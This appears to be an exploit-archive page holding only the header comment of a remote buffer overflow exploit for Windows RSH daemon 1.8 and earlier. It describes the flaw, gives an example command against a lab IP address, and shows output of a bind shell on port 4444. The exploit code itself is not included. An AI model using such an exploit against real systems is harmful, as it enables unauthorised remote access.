Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit

* Windows RSH daemon <=1.8 remote exploit
 * =======================================
 * rshd is a multithreaded daemon service that listens for connections on port 514
 * (tcp port for the shell/cmd protocol), runs commands passed by clients and sends back the
 * results. Insufficient bounds checking performed during memory copy operation in RSH daemon
 * makes the service susciptible to a remotely exploitable buffer overflow condition.
 *
 * Example Use.
 * debian:~/prdelka-vs-MS-rshd# ./prdelka-vs-MS-rshd -s 192.168.184.131 -x 0 -t 12 2>/dev/null
 * [ Windows RSH daemon 1.8 remote exploit
 * [ Using shellcode 'Win32 x86 bind() shellcode (4444/tcp default)' (400 bytes)
 * [ Using target 'Windows 2000 5.0.0.0 SP0 (x86)'
 * [ Connected to 192.168.184.131 (514/tcp)
 * [ Connecting to shell on 192.168.184.131 (4444/tcp)
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-1999 Microsoft Corp.
 *
 * dir
 * C:\Program Files\rshd\bin>dir
 * Volume in drive C has no label.
 * Volume Serial Number is C0F4-19C8
 *
 * Directory of C:\Program Files\rshd\bin
 *
 * 26/07/2007  15:18       <DIR>          .
 * 26/07/2007  15:18       <DIR>          ..
 * 26/07/2007  15:18               73,728 rshd.exe
 *               1 File(s)         73,728 bytes
 *               2 Dir(s)   6,839,975,936 bytes free
 *
 * - prdelka

http://www.vfocus.net/art/20080118/3326.html